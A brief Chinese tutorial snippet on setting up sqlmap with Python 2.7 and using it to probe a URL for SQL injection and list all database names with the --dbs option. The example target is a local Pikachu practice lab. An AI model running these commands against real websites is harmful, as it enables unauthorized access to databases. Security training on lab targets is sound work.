首先安装python2.7,将sqlmap文件夹添加到python2.7的根目录
创建快捷方式,安装sqlmap。详情可以百度。
打开sqlmap,输入python sqlmap.py -h.
检测注入点是否可用
C:\Python27\sqlmap>python sqlmap.py -u “网址”
一条命令即可曝出该sqlserver中所有数据库名称,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u “http://127.0.0.1:88/pikachu-master/vul/burteforce/bf_form.php” --dbs